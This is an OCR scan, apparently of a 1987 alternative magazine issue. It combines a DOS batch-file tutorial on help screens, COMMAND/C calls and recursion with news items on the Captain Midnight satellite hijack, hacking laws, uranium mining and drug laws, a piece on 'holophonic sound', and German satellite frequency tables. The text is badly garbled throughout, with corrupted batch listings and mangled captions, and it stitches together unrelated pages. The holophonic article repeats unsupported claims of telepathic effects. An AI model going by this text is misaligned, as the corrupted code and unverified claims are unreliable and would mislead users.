out of the program, we can have the 

( best of both worlds. 

:LOOP 

IF %1(®==@CRLF 
PRT %1 

FOR %%@ IN(SH1FT GOTO) 


You may want to create a complex f 
batch file to automate an obnoxious | 
procedure, but perhaps you don't r 
use it often enough to remember its \ 
complex call syntax. 

The answer to this is to set the 
batch file up so it will give you some 
instructions if calied with no argu¬ 
ments. For example, here is the Start 
of my batch program 'DL0AD.BAT' 
which permits unattended download- 
ing of partitioned datasels from the 
IBM mainframe, a procedure that 
could take hours. The actual down- 
load procedure is so slow that batch 
file speed is a negligible factor, so 
nothing is compressed into FOR 
loops here. 

ECHO OFF 
CLS 

IF NOT %'1@==@G0T0 START 
ECHO DOWNLOAD PARTITIONED 
DATASETS from MAINFRAME 
ECHO 

ECHO SYNTAX: DLOAD DSN DIR 
MEMBERI MEMBER2 
MEMBER3... 

ECHO Where DSN is the fully 
qualified dataset name, 

ECHO DIR is the 

destination subdirectory. 

ECHO and MEMBERn 
are any number of member 
names. 

CRLF 
; START 
SET DSN = %1 
SHIFT 

SETDIR=%1 _ 

FOR %%@ IN(MD SHIFT) %%@ \ /o1 

MD\%1 >NUL 

SHIFT 

:D0 

1F%1@==@CRLF 
<DOWNLOAD PROCEDURE> 

SHIFT 

GOTO DO , 

Several techniques are used in this 
program. If DLOAD is entered with 
no arguments, the first IF Statement 
detects this, and the instructions are 


echoed. When DLOAD is calied with 
arguments, the first variable is set to 
%DSN% for later use by <downloacl 
procedure>, then is shifted away. 
The second variable (now %1) is 
stored as %DIR% and then creates 
the desired subdirectory before 
banishment by shifting. The 'mem- 
bers' are shifted in turn into Position 
%1 by the loop, until they are all 
used up. Exils from the program are 
by fast calls to CRLF.BAT, which was 
created earlier. If the attempt to 
make the subdirectory fails, perhaps 
because the subdirectory already ex- 
ists, the resulting error message will 
be shunted off to NUL. 

Menus 

Fig 1 Shows a program to control 
some settings for an Epson/lBM-type 
Printer. It will display a menu if cal¬ 
ied without argument, but this menu 
may be bypassed if the user knows 
what to enter. 


Calling batch files 

Now we will see how we can call 
another batch file and return from it, 
as though it were a subroutine. If 
you Chain to another batch program, 
that's it — there is no return. The 
secret of true calls is the 'COM¬ 
MAND' Statement. 

'COMMAND' loads another copy of 
pari of COMMAND.COM into mem- 
ory and gives it control. This does 
not consume as much memory as 
IBM would have you believe, since it 
does not load another copy of the 
whole 28k or 40k COMMAND.COM — 
it only loads another copy of the 
command processor which is about 
4k. The new command processor 
runs quite independently of the pre- 
vious one. 

The command 'EXIT' purges the 
currently executing command pro¬ 
cessor and puts you back to the pre- 
vious one. EXIT does nothing if en¬ 
tered into the one and only original 
command processor. 

It is not obvious what the use of 
this is until you remember file re- 
direction. What happens if the new 
command processor takes its input 
from a ff/e? Try it by making a file 
full of commands, ending with EXIT. 
We'll call it GIZMO. (If you don't end 
this file with EXIT you'll never return; 
the Computer will hang up for good ) 
VOL 

ECHO This line is from 
the calied file. 

VER 

EXIT 

Next create DR1VE.BAT and run it- 
ECHO OFF 
CLS 

ECHO This line is from 
the main program. 



PP.BAT 

ECHO OFF 
CLS 

IF NOT %1@==@ GOTO %1 
ECHO Enter PP E for elite 
ECHO PP W for Wide 

ECHO PP B for BOLD 

ECHO PP R to reset printer 

CRLF 
:E 

ECHO "[M*[rG >PRN 

CRLF 

:P 

ECHO ■[P>PRN 


PP P for pica 

PP C for Condensed 

PP D for doublestrike 


COMMAND <GIZMO 
ECHO This line is again 
from the main program. 

This illustrates the general princi- 
ples. We can vastly improve on this, 
though. The special form: 
COMMAND/C String 
says, in effect, to invoke a new com- 
mand processor, feed it 'string' as an 
input command, execute the com- 
mand, then EXIT. If we feed a com¬ 
mand processor a batch file name, it 
executes the batch file. Because of 
this we can rename GIZMO to GIZ- 
MO.BAT and drop the EXIT com¬ 
mand from the end, thereby Convert¬ 
ing it into a plain vanilla batch file. 
Change DRIVE.BAT as follows; 

ECHO OFF 
CLS 

ECHO This line is from 
the main program. 

COMMAND/C GIZMO 
ECHO This line is again 
from the main program. 

This is almost the effect we want. 
We are spared the Installation mes- 
sage from the command processor, 
but the secondary command proces¬ 
sor echoes everything. Even if you 
put ECHO OFF at the beginning of 
GIZMO.BAT it will still echo the first 
prompt and the ECHO OFF, If it is 
really important to silence every¬ 
thing, you can use redirection. 
Change the programs as follows: 
GIZMO.BAT: 

VOL >CON 

ECHO This line from the 
calied file. >CON 
VER >CON 
DRIVE.BAT: 

ECHO OFF 
CLS 

ECHO This line from the 
original batch program 
COMMAND/C GIZMO >NUL 
ECHO This line again from 
the calied program 
The trick here is to send all output 
from the secondary command pro¬ 
cessor into NUL. Then we override 
this in the calied batch file with re- 
directions to CON for everything we 
really want to see. (More examples 


on this are given below.) 

This call/return procedure can be 
nested to any depth that your mem- 
ory allows, and you can play tricks 
with variables. Try these three batch 
programs. 

MAIN.BAT 
ECHO OFF 
CLS 

ECHO MAIN here. Are you watching? 
COMMAND/C SUBFILE1 file speak 
sub %1 >NUL 

ECHO Whew! We made it back to 
MAIN again. 

SUBFILE1.BAT 

ECHO This is %3%1 1 %2ing. »CON 
COMMAND/C %3%12 %1 %2 %3 
%4 

ECHO Goodbye from %3%1 1. 

>CON 

SUBFILE2.BAT 

ECHO Now %3%1 2 %2s. >CON 
IF NOT %4@==@ ECHO 
What does "%4" mean? >CON 
Try launching this collection with 
'MAIN' and 'MAIN AXOLOTL'. 

More practically, suppose I have a 
lot of programs to download from 
the mainframe with DLOAD.BAT. 
What I want are several members 
from each of several partitioned 
datasets. This whole procedure 
might take all night — I plan to sub- 
mit a huge metabatch file when I go 
home in the evening. I can create a 
driver for DLOAD.BAT and off we go: 
COMMAND/C DLOAD BNW.TE.CLIST 
TECLIST Ml M2 M3 M4 ... 
COMMAND/C DLOAD BNW.TE.SAS 
TESAS Ml M2 M3 M4 ... 
COMMAND/C DLOAD BNW.TE. 
TABLES 

TETABLES Ml M2 M3 M4 ... 

If nothing goes horribly wrong, I 
should return in the morning to find 
the selected members neatly copied 
into appropriate subdirectories. 

Recursion 

By now you may be saying 'All that 
is very well, but if a batch file can be 
made to call another file, what would 
happen if you asked it to call itselfor 
maybe call another batch file that 
calied the first one, or maybe...' 


Being of an inquisitive nature I ex- 
plored some of these questions. The 
answer, in general, is that you can 
have any number of recursive chains 
or calls, so long as memory and file 
handles are available. If you are care- 
ful of Counts and end conditions, you 
won't get in too much trouble. On 
the other hand, if one of these were 
to run away ... 

To ease into this subject, we'll con- 
sider recursive chaining first. Recur¬ 
sive chaining is an alternative to SET 
that initialises variables for further 
use by the program. The difference is 
that this way the program sets %1 
through %9, so an Operation like 
SHIFT might be used against them. 
Nothing fancy is needed for recursive 
chaining. Consider a file calied 
CHAIN.BAT: 

ECHO OFF 
CLS 

IF %i@==@ CHAIN 123456789 
:D0 

ECHO <DO SOMETHING WITH 
FILE%1> 

SHIFT 

IF NOT %1@==@ GOTO DO 
Here is a catalogue printer for your 
hard disk. Your various subdirec¬ 
tories are 'remembered' in the re¬ 
cursive call Statement. 

CAT.BAT 
ECHO OFF 
CLS 

IF %1@==@ CAT DBASE LOTUS 
ORD WRK C 
CD\ 

DIR I SORT >PRN 
:LOOP 

DIR\%1 I SORT>PRN 
FOR %%@ INISHIFT IF) DO %%@ 
NOT %1@==@ GOTO LOOP 
CAT.BAT will print catalogues for 
any arbitrary’ selection of directories 
if calied like this: 

CAT DIR 1 DIR2 DIR3... 

Suppose you have a file card 
ACTION.DATA which expects to find 
data in the form of tokens in a file 
calied DATA.BAT. Possibly DATA- 
.BAT was generated by another prog¬ 
ram which could be another — or 
even this — batch file. DATA.BAT 
contains a Statement as follows: 
ACTION DATA1 DATA2 DATA3 .. . 
ACTION.BAT Starts as follows: 

IF %1@==@ DATA 
As we can see, if ACTION.BAT is 
calied with no arguments, it will im- 
mediately chain to DATA.BAT which 
calls ACTION right back, passing 
DATA1, DATA2, DATA3 ... to it as 
%1,%2, %3... 

So far I haven't been able to think 
of something I needed to do with 
batch Processing that couldn't be 
done more easily some other way. 
No doubt the Lisp-wallahs out there 
will immediately think of several im¬ 
portant applications. On the other 
hand, this may be one of those case 
which vividly illustrates the differ¬ 
ence between what you get away 
with and what's useful. n?Ii1 


Quelle unbekanm 










American executives calied it “video terrorisrn 
but there was no denying a Champion of the atiz- 
ens had been born. John MacDougall 25, of Flor¬ 
ida, alias Capfain Midnight, patched a 4/a minute 
message onto a Home Box Office movie beamed 
to American viewers via a Hughes Communicafions 
satellife. 

Appropriately, the message came across tne 
broadcasting on April 27th. 1986 °Mhe movie 
The Falcon and the Snowman, which dealt with 
security penetration of classified mformation y 
the American Soviet agent Christopher Boyce. 

Captain Midnight’s Statement was a warning: 
his brief message,that home satellite viewers would 
fight back, sent chills down the spine of every 
broadcast execu tive in the co untry. 

THERE CMi -1 ii /Ti 

■ pouanr, COMRAPE öENE^RAL . T I jl 

R OUR SATELüTe ^WöRK y 

IS UNDEB ATTACM. y ^ 


Massive amounts of sensitve American Defense 
Department information was carried along the 
same commercial satellite networks that MacDou¬ 
gall exposed as vulnerable to Computer hackers, 
pranksters or satellite Saboteurs. MacDougall had 
instigated his message from a commercial broad¬ 
cast facility - making not only HBO or Hughes ex¬ 
ecutives but defence officials even more anxious. 

If MacDougall had chosen to point his antenna 
at a Pentagon satellite instead, the/American mpn- 
-itoring of those channels might have assumed that 
the Soviets were about to fire their bombs and 
were taking the first step by jamming US ability to 
retaliate. 

via Mother Jones Oct. ‘86 


T OlO NOT THE THINK THE ^ 
AMERICAH5 SO POOUSf^..J 





HACKING LAWS 


A meeling of Federal and 
State atlorneys-general in 
March will outline new Uws 
which will render Computer 
hacking an offence. Their 
Hm will be to stop people 
interfering with data bases. 

At present it is an offence 
to physically damage a Com¬ 
puter System but tarnpering 
with the information inside a 
computer's memory has not 
been covered by law. A work¬ 
ing party has been operation¬ 
al since November to look into 
Computer crimes/law. This 
was done after a report by 
the Tasmaniar» Law Reform 
Commission was presented to 
a meeting of Attorneys-Gener¬ 
al. A recent case in Perth in- 
volved Donald McLeod who 
programmed the Australian 
Bureau of Statistics Computer 
to dump its memory störe. 


Chis. Mery doie, 

t'lovj -(ry aßain 








leach mining 

In Western Australia some 
mystery surrounds French ur- 
anium leach mining. The 
French energy glant, Total has 
been extracting yellowcake from 
a vast uranium deposit near 
Onslow using the environmenta- 
My destructive method of Solut¬ 
ion mining. The French have 
exported tonnes ot yellow cake 
from their Manyingee prospect. 

Uranium “exploration” licerice 
in W.A. apparently means tests, 
trials, yellow cake production 
and export. But such severe 
damage has been inflicted by Sol¬ 
ution mining that State Parli- 
ament is Icoking at legislation 
for environmental protection by 
banning solution mining 
For more info CONTACT: Shy- 
Peeble Box 889 Kalqoorlie. 


Hc was fined $200 after ad- 
mitting his ‘prank‘ to Federal 
Police stating that he knew 
there was a back up disc. 



life for half a kilo 




eensland brought in some of the 
toughest drug laws in the Wo.* 
ern World. 

Under the Drugs Misuse Act 
possession of two grams of her- 
oin or cocaine or 0.004 of a gram 
of LSD cavries a mandatory lifo 
sentence. 

The extraprdinary draconian ai 

legislation stipulates the samo * 
sentence for trafficking and gives 
Police Wide powers to tap private * 
phones. ^ 

People in possession of 500 ' 
grams of cannabis can be jailed 
for life. ‘ 


AFÄ Mit nm 





MAGGIE’S FARM Alternative Network Magazine - Issue 35 - 1987 



-ÜSr * 4«- 














I)olop][)ontc 

siounb 


— the "Feelies” of the future? 


A 26 year old Italian scient- 
ist living in London has invented 
new sound technique that 
broadcasts a frequency pattem 
directly to the brain, by-passing 
the ears altogther. 

Originally deveioped in re- 
search to heip the deaf, holo- 
phonic sound is set to be one of 
the major technological break- 
throughs of the ‘80’s that puts 
Stereo, quad or any other conven 
-tional spatial effect very much 
in the kiddie’s playpen division. 

"Holophonic Sound” is in the 
patent process in nine European 
countries. CBS-U.K. will soon 
release an album of holophonic 
sound effects. 

Major recording artists like 
Paul McCartney and Peter Gab¬ 
riel have approached the inventor 
HUGO ZUCCARELLI and his 
Partner sound engineer, Mike 
King. 

Zuccarelli believes the ear/ 
brain generates its own refer- 
ence beam. Using a technique 
analogous to the laser beam in 
holograms external sounds are re- 
corded with synthesized referen- 
ce sounds. The brain provides 
its own second reference beam 
and “decodes” the holophonic 
record reproducing the original 
ambient conditions. 


Not only does holophonic 
sound create a third-dimension 
sound enwironment, it triggers 
other sensory modalities aswell. 
This extraordinary "synesthesia” 
could launch a major new dir- 
ection in brain research and her- 
ald thai entertainment of the 
brave new worid, The “Feelies”. 
For example, the sound of a 
match being struck elicts the 
smell of sulphur. A voice whisp- 
ering dose to the ear is accomp- 
anied by a Sensation of warm 
breath. The super reality of the 
perceived sound either triggers 
off complementary sensations, or 
other sensory “information” can 
also be encoded onto the frequen 
-cy phase waves directed to the 
brain." 




The total effect of a holo¬ 
phonic recording is like a multi¬ 
dimensional “picture” created by 
phase interference patter- 
ns or, quite simply, sound. 


W^^^ELECTRIC AIR WAVES 


¥ 

i 

I 


Listeners typically describe the 
effect as “realer than real". It 
has a stränge penetrating inten- 
sity.Holophonic sound is appar- 
ently audible to many hearing 
impaired individuals. Blind list¬ 
eners report strong visual imag- 
ery. People wearing head-sets in 
grqups together report surprising 
telepathic effects. 

Zuccarelli has approached 
sound recording from a thorough 
Knowledge of brain physiology 
rather than acoustics or electron¬ 
ic engineering. If Zuccarelli’s 
biologically-based technology all- 
ows for the encoding of more 
than sound, we enter a whole 
new realm of being able to re- 
play a total experience. A future 
holophonic recording played on 
digital tape equipment could 
create its. own compelling envir- 
onment. CONTACT:- Zuccarelli, 
78 priory Rd, London, N8. 


The Explosion of 
Community Radio 




Country airwaves are sudden- 
ly alive with the sound of music. 
The remarkabte explosion of in- 
terest In community FM radio 
and participation medla over the 
p3St two years has turned the FM 
dial in many local sreas into a 
"homegrown" treat. Well over 
a thousand new community FM 
jicences have been applied for 




We checked in on a collect- 
ive meeting at each Station and 
discusscd program tapes **inter- 
swap" between community stat- 
Ions, as weil as arranging for 
future Maggie's Farm radio pro- 


The rapid increase in Citizen 
initiative networks and “altern- 
ative''media has Maggie’s Farm 
blitzed by fresh data and pub- 
iications from all over the worid 
-always far more than can be 
collated into one little magazine. 


pulting most recent applicat- 
^ ions on an 18 month waiting 
^ list.With the new community rad- 
io Station, 2RBM—FM budding 
^ near the Maggie's Farm Southern 
^ base in The Blue Mountains - 
first test broadcast in May-some 
^ of the Maggie's crew visited 
^ 2BOBFM in Taree and 2BBB FM 

I'' 

1 


in Bellingen to swap notes. 



ti 

We have been looking at various ^ 
ways of sharing this “over splll“ rM 
of excellent current news and ^ 
ideas with the network at large, 
Even Maggie’s Interviews in the ^ 
field, given broadcast quality, 
can be shared on community 
radio, going into much more ^ 
ränge and depth that prInt media ^ 
allows. 

As interaction between key ^ 
network groups and blossoraing 
community radio develops^ we ^ 
can expect the rieh variety of 
“alternative" media and Citizen ^ 
initiative groups to lend much ^ 
flavour to the airwaves. 

-Editoral Collective ^ 

jS 


MAGGIE S FARM Alternative Network Magazine - Issue 35 - 1987 




^ . 


i^iiM 






horizontal 


vertikal 




60° Ost 

INTELSAT VA - F12 


Erste Zwischen¬ 
frequenz 


Frequenz- 

Bereich 


13° Ost 

^TELSAT W (EOS 1) 


27,5° VVest 
INTELSAT VA - f 
horizontal T « 


MHz 


horizontal vertikal 


GHz 


B-irr 


SAT-TV-PROGRAMMTABELLEN 

DIE SATELLITEN Ul 


950 


« DiesGs Programm wird über den Ostbeam abgestrahlt und ist deshalb nicht in der gleichen Qualität wie die anderen 
Programme zu empfangen 

„Film Net", „Premiere" und „BBC" werden verschlüsselt abgestrahlt. 

„Sky Channel" momentan unverschlüsselt. 

spaltet den Transponder zeitweise auf, um zusätzlich „RAI-DDE” zu übertragen. 


In der nachstehenden Tabelle wird außer der Original-SAT- 
Abstrahlfrequenz in GHz auch die erste Zwischenfrequenz im 
Zwischenfrequenzbereich 950 - 1700 MHz und im Zwischgn- 
frequenzbereich 1284 - 1534 MHz (Telecom) aufgeführt. 


DER HAUPTSATELLIT 














4 


SAT-TV-PROGRAMMTABELLEN 


D IHRE PROGRAMME 



Die Weltkugel ist in dieser Grafik auf den Kopf gestellt, was 
Ihnen das Finden der einzelnen Satelliten erleichtern soll. 
Ausgehend vom Eutelsat 1 - F1 (ECS-1), der etwa im Süden 
steht, finden Sie den Intelsat VA - F12 links im Osten und den 
Intelsat VA - F11 rechts im Westen. 


SATTV-Programme mit Videotext 



RAI UNO 


SKY CHANNEL 

SKYTEXT 

SUPERCHANNEL 

SUPERTEXT 



WDF-WEST3 
■ BAYERN 3 


BAYERNTEXT 



8° West 
TELECOM 1A 


Frequenz- Erste Zwischen- 
Bereich frequenz 


7° Ost 

EUtELSAT 1-F2 

10° Ost 

EUTELSAT 1 - F4 (ECS 4) 

1° West 

INTELSAT VA-F2 

horizontal 

horizontal 

vertikal 

horizontal 


i-IVIAC Fernsehsystem 


© = C-MAC 


0 = C-MAC/Tandberg 


© = SECAM 































Ji SAT-TV-PROGRAMMTABELLEN 

DIE SATELLITEN UND IHRE PROGRAMME 


Stereokanalpaarungen Telecom 1A • 8° West 


Die Weltkugel ist in dieser Gralik 'auf den 
Kopf gestellt, was Ihnen das Finden der 
einzelnen Satelliten erleichtern soll. 


' Xnl ;'T 

';ri lv 

RS 



■‘f«5 -y: 


i7sa 

.t-yxAr-: 

12564^ 

12606 

. AIa'.,.,- 

'12648 

„»2fi90- 



_ fO 

2.3S Miz 

1 




( 




L f6 

S,80 »ftz 







1 1 


1 1 


r 

' 

ß,20 Mtz 


Frequenzbereich 12.5 • 12.75 GHz l—- - 7.75 

I \ 1 _ fe - 6 ,JO Mtz 

Nord ------- 

FERNSEHEN + RADIO ÜBER DEN FRANZÖSISCHEN TELECOM-SATELLITEN 1 A (12,5 -12 ,75 GHz) 

— c^^^r|T| rHF M 1^‘^TRAHI IINGFN VERTIKAL (KEIN POLARISER NOTWENDIG.I LEDIGÜCH^ FEEDHORN)^ 

' ' •• _ ■ ■■ - ■ .. ' ■ ■.. .. . I 7 ■■ r-. > .Z7 ~ > ■ ' L.. , US- 



TRANS-’’ 

PONDER 

NR. 

FREQUENZ 

GHz.;. 

TV/FERNSEHEN.Lvyi?yS'.?]y'IS7 

RI 

7-' / f- 

.. ;:i'4 

’ ^1- 

12 522 

ui- • - l ■ 

•'il’- '1 

M6 (Clips-t-Musik-hUnterh. 
-FFilme+Nachrichten) 
von ca. 10.00 • ca. 2.00 Uhr 
ca. 16 Stunden täglich 

R2 

'rli'lVM 

IBÜ 

Digitaler Business 

Service-Daten ü bertragu ng 

R3yi|i! 

12 606 

i'.-U'V •m" • 

'u *• / 

LA CINQ (LA 5), (FILMPRG.) S 
von ca. 7.00 - ca. 1.40 Uhr 
ca. 18 Stunden täglich 


AQUARELLE 
RTL (FRANZ.) 
EUROPE 1 


6.200/7.400 
6.500/7.770 ** 
6.850/8.200 ** 



R4 ' \ 12 648 


Träger für rechts aufgeführte 
Hörfunkprogramme 



EUROPE 2 

6.200/7.400 ** 

AFP - AGENCE FRANCE 

7.750 

PRESS (DATENÜBERTR.) 
RADIO NOSTALGIE 

6.850/8.200 ** 

PACIFIC FM 

2.700/3.150 ** 

SKY ROCK 

3.600/4.200 ” 

FUN FM 

4.950/5.800 

RFM 

2.350/5.350 ** 

NRJ-RADIO ENERGIE 

6.850/8.200 ** 

RMC 

6.200/7.400 *** 

KISS FM 

6.500/7.750 * * 


R5 . 12.690 ; ■ Gelegentliche Übertra- 

■ gungen/Video-Übertragung 


R6 '■' •1 12 732 '■ Übertragung digitaler 
Audio-Kanäle **'* 


V-.j iy irt 


K1SS(13/U)**** 
RADIO FRANCE 1 
(17/18) **** 
RADIO FRANCE 2 
(19/20) •*“ 


* * Stereo ‘ * * 2-sprachig 

- 1 . Freq. links - 1. Freq. franz. 

- 2. Freq. rechts - 2. Freq. ital. 

Die Radioprogramme SKY ROCK, PA¬ 
CIFIC, RFM* sind im Audiobereich un¬ 
ter 4.80 MHz (handelsübliche SAT- ' 
Empfänger und Stereo - Processoren 
verfügen normalerweise nur über den 
Audioempfangsbereich von 4.80 bis 
8.20 MHz) zu empfangen! 

* RFM ist deshalb mit handelsüblichen 
SAT-Receivern nur in Mono emn. 
fangbar. 


__L_---:-'______ 

--p^-^ris'^erden zu verschiedeneTTzeiten Spartenprogramme (z.B. 1 x wöchentlich Progr. für Arzte), abgestrahlt. Alle RadioprogrammeiÄsü);^ 

Auf den Kanälen R1. n5i nbweraen ZU ve SC 

-'?.9iif^'g^^P;,"g"9,7d,gifalen'Audiokanäle mit handelsüblichen Salellilenempfängern nicht möglich. 


i:Ä= 














/Pos. -.*■ 

,-v . / 

7 Polartfit/^ > Dfenst ^ ‘ Aiidk>-‘’ ‘ 7''. 

'.r Zentrum / v^-v-ri^'beschreibuno 

‘.Strahf- ~ ^ «tf^fiequenz 

H'.fr^uerc ^ ^ BW Land ^ c ^‘I'O^cno* Zertrui^ 

Eut I-F1 

13.0 E 

1X(1) 

WS 

H-11.007 

36 

RAI-Uno, ftalien 

6.60 MHz 47 dBW 

Eut 1-F1 

13.0 E 

3X(3) 

WS 

H-11.174 

36 

3Sat, BRD. Österreich/Schweiz 

6 65 MHz 47 dBW 

Eut 1-F1 

13.0 E 

4X(4) 

WS 

H-11.472 

36 

TV5. Frank/eich 

6,65 MHz 47 dßW 

Eut 1-Fl 

13.0 E 

4X(4) 

WS 

H-11.486 

36 

Woridnet, USA + Sweden Today 

6.65 MHz 47 dBW 

Eut 1-F1 

13.0 E 

6X(6j 

WS 

H-11.650 

27 

Sky Channel. Arts Channel. UK 
Stereo S/C: 

6.65 MHz 47 dBW 

7.02/7.20 MHz 

Eut 1-Fl 

13.0 E 

1Y(7) 

WS 

v-io.gss 

36 

Tdedub. Schweiz/BR Oeutschland 6.50 MHz 47 dBW 

Eut 1-Ft 

13.0 E 

2YC8) 

ES 

V.11.091 

36 

RTL plus, BR Deutschland 

6.65 MHz 45 dBW 

Eut 1-Fl 

13.0 E 

3Y(9) 

WS 

V-11,140 

36 

RImnet, Belgien 

6.60 MHz 47 dBW 

Eut 1-Fl 

13,0 E 

4Y(10) 

WS 

V-n,507 

36 

Sat 1, BFl Deutscfiland 

6.65 MHz 47 dBW 

Eut 1-Fl 

13.0 E 

6Y{12) 

WS 

V-11.674 

36 

Super Channel. UK, 

Stereo S/C: 

6.65 MHz 47 dBW 

7.02/7,20 MHz . 

Eut 1-F4 

10.0 E 

9 

WS 

V-11.181 

27 

NRK, Norwegen 

C-MAC 44 dBW 

Eut 1-F4 

10.0 E 

12Y 

WS 

V-11.654 

36 

TVE, Spanien 

6.60 MHz 46 dBW 

Eut 1-F2 

7.0 E 

1 

EB 

H-10.972 

36 

Euroviaon, EBU 

Sound in Sync. 39 dBW 

Eut 1-F2 

7.0 E 

1X(1) 

EB 

H-11.009 

36 

Eurovision. EBU 

Sound in Sync. 39 dBW 

Eut1-F2 

7.0 E 

5X(5) 

ES 

K11.591 

36 

Woridnet. USA 

6,60 MHz 47 dBW 

Eut 1-F2 

7.0 E 

3Y{9) 

EB 

V-11.142 

36 

Eurovision, EBU 

Sound in Sync, 39 dBW 

Eut 1-F2 

7.0 E 

4Y(10) 

WS 

V-l 1.472 

36 

Business TV Netvw^rk 

6 60 MHz 47 dBW 

Eut1*F2 

7.0 E 

4Y(10) 

WS 

V-11.676 

36 

Visnews 

6.60 MHz 47 dBW 

I-V-F2 

1.0 W 

36(20) 

G 

RH-4.08575 

20 

zeitw. Video 

Azoren, USA & Kanada 

6.65 MHz 22 dBW 

1-V-F2 

1.0 W 

36<21) 

G 

RH-1.10425 

20 

Brightstar, USA 
wechselt auf anderen Intelsat 

6.60 MHz 22 dBW 

I-V-F2 

1.0 W 

38(24) 

G 

RH-4.1750 

30 

AFRTS. USA 

6 80 MHz 26 dBW 

I-V-F2 

1.0 W 

63(2W) 

WS 

H-11.015 

30 

InfoRlm, Norwegen 

6.60 MHz 43 dBW 

I-V-F2 

1.0 W 

61(3W) 

WS 

H-11.133 

30 

Sveriges Television 

SVT-1. Schweden 

digital 44 dBW 



4/ SAT-JV-PROGRAMMTABELLEN 

SAT-TV-Aussendungen Mitteleuropa (Fortsetzung) 




'’VMr.'i 

1 


^■^Zersnm ' fv' 

W: 


J-Jfaquenj 


I-V-F2 

1.0W 

63(4W) WS 

H-11.178 

30 

Sveriges Television 

SVT-2, Schweden 

digital 

44 dBW 

(-V-F2 

1.0 w 

71(2E) 

ES 

V-11.160 

30 

Israel Cable TV 

6.60 MHz 

44 dBW 

(-V-F2 

1.0W 

79 

ES 

V-11.595 

30 

Israel TV-2 

6.60 MHz 

44 dBW 

I-V-F2 

1.0W 

11(01) 

EH 

RH-3.725 

20 

TVGabon 

6.20 MHz 

22 dBW 

I-VF2 

1.0W 

53(10) 

Z/NE 

LH-3.900 

30 

AFRTS-Süd-EufOpa Sender 

6.80 MHz 

30 dBW 

l•VF2 

1.0 w 

13(10) 

EH 

RH-3.912 

20 

Tele-Sahel, Niger 

5.50 MHz 

22 dBW 

Tel 1-Fl 

8.0 W 

R1(1) 

S 


V-12.522 

30 

M6 Frankreich 

5.80 MHz 

52 dBW 

Tel 1-Fl 

8.0 W 

R2(2) 

G 


v-12.564 

30 

Dgitaler Business 
Service/Frankreich 

5.80 MHz 

52 dBW 

Tel1-Fl 

8.0 W 

R3(3) 

s 


V-12.606 

30 

La Cinq, Frankreich 

5.80 MHz 

52 dBW 

Tel 1-Fl 

8.0 W 

R5{5) 

G/S 

V-12.708 

30 

zeit«. Video 

5.80 MHz 

52 dBW 

Tel I Fl 

8.0 W 

R6(ß) 

G 


V-12.732 

30 

digitale Audiokanäle 

5.80 MHz 

52 dBW 

Gor 7 

n.o w 

6(-1) 

s 


RH-3,675 

40 

1 Programma 

7.00 MHz 

46 dBW 

Gor 7 

11.0W 

7(1) 

G 


RH-3725 

36 

Intersputnik, zeitw. Video 

7.50 MHz 

32 dBW 

Gor 12 

14.0 W 

7(1) 

G 


RH-3.725 

36 

Interspuinik, zeitw. Video 
©nschl. Vremya 

T.50 MHz 

32 dBW 

Gor 12 

14.0 W 

9(6) 

G 


RH-3.825 

36 

(ntersputnik. zettw. Video 
einschl. TV Cubana 

7.50 MHz 

32 dBW 

Gor 12 

14.0 W 

L7 

s 


RH-11.541 

36 

zeitw. Video-Tests, USSR 

7.50 MHz 

42 dBW 

I-V-F6 

18.5W 

38(23) 

G 


RH-4.1665 

20 

zeitw. int. Video 
versch. 

6.60 oder 

6.65 MHz 

21 

dBW 

I-V-F6 

18.5W 

38(24) 

G 


RH-4.1885 

20 

zeitw. int. Video 
versch. 

6.60 oder 

6.65 MHz 

21 

dBW 

I-V-F6 

18.5W 

71(1 E) 
72(2E) 

ES 

V-10.995/ 

V-11.135 & 
V-11.175 

30 

zeitw. int. Video, Lario. Italien 
Test-Sendungen 

6.65 MHz 

42 dBW 

I-IVA-F4 

21.5 W 

7B(13) 

EH 

RH-3.96575 

18 

TV Sudan 

‘V'Pf' 

3.99225 MHz 

21 dBW 

liVA-F4 

21.5 W 

9B{17) 

EH 

RH-4.04575 

18 

TV Zaire 

^ppr 

4.07183 MHz 

21 dBW 

1-VA-F10 

24.5 W 

38(23) 

G 


RH-4.1665 

20 

zeitw. int, Video 
versch. 

6.60 oder 

6.65 MHz 

21 

dBW 

1-VA-F10 

24.5 W 

38(24) 

G 


RH-4.1885 

20 

zeitw. int. Video 
versch. 

6.60 Oder 

6.65 MHz 

21 

dBW 































S/l T-rV-PRQGRAMMTABELLEN 

SAT-TV-Aussendungen Mitteleuropa 

INTELSAT/EUTELSAT/TELECOM UND GORIZONT-DIENSTE IN DER 
ITU-REGION NR. 1 



Poiariät/ . Otena-' •. .> 

Zentfum i-,Ceachreibur»g 

SlraW- 

Vi.-BW : Lärij “'»if. '■ 


l-V-F? 66.0 E 12(06) WH RH-3.875 30 TV Algerien 


l-V-F? 66,0 e 69 WS H-11.470 27 AFRTS Türkei 

I-V-F7 66.0 E 69 WS H-11.650 30 TRT-1 Türkei 

I-V-F7 66.0 E 69 WS H-11.680 30 TRT-2 Türkei 

l-V-FS 63,0 E 11(01) WH RH*3.70e 27 SABC Südafrika 



SCPC 22 dßW 

@ 3696 MH2 

&MAC 42 dBW 

6.65 MHz 42 dBW 

6.65 MHz 42 dBW 

B-MAC 33 dBW 



SfraWandeagnalionen- G ■ Global; SG ■ hamisphäriscb; 2 > Zoft«; S b Punirt/Spot; 2/NE - 2on« Nofdo»; WS - Westspol: ES - Oslspot; EM - dsd. Hernisphife: 
WH w«tl. Hentscbdr«; ES - EufOSfrabl — Polartläton; RH » fscbtsafebeod. zirkular; LH ■ IioKsörebena. zirkulär: H ■ Honzortaf; V ■ Venriiai — BW ■ Barxibreite. 
SCPC - t Träger o<o (Me Träger-Frequenzen snd m GHz angegeben). 

■ (S<ehe auch separate Listen Zur AudioUntertriger in Ster« sowie Audio-Unienräger lüi HPrfunkprogramfre.) 




U sat-jv-programmtabsllen 


l-VA-FII 27.5 W 21(04) EH 


' ZenWJi^,,;- 
^/frequet^ 



30 Worldnet, USA 


I-VA-F11 27.5 W 24(16) EH RH-4.0225 20 TV Übyen 

I VA-F11 27,5 W 25(18) EH RH-4.0645 20 NTA Channel 10. Lagos. Nigeria 


l-VA-FII 27.5W 36(20) G 
I-VA-F11 27 5 W 87(21) G 


RH-4.095 20 TV Nacionale de Chile 

LH-4.125 27 FBIS, USA 


6.60 MHz 
6.20 MHz 


SCPC 

4.03723 MHz 


6.60 MHz 
B-MAC 


I-VA-Fl 1 27.5 W 69(5/6W) WS 


27 Sateilitervlnfo Service 


l-VA-FII 27.5 W 71(1£) ES V-10,995 30 zeitw. Video, UK 

l-VA-FII 27.5W 73(2E) ES V.11.155 30 Cable News 

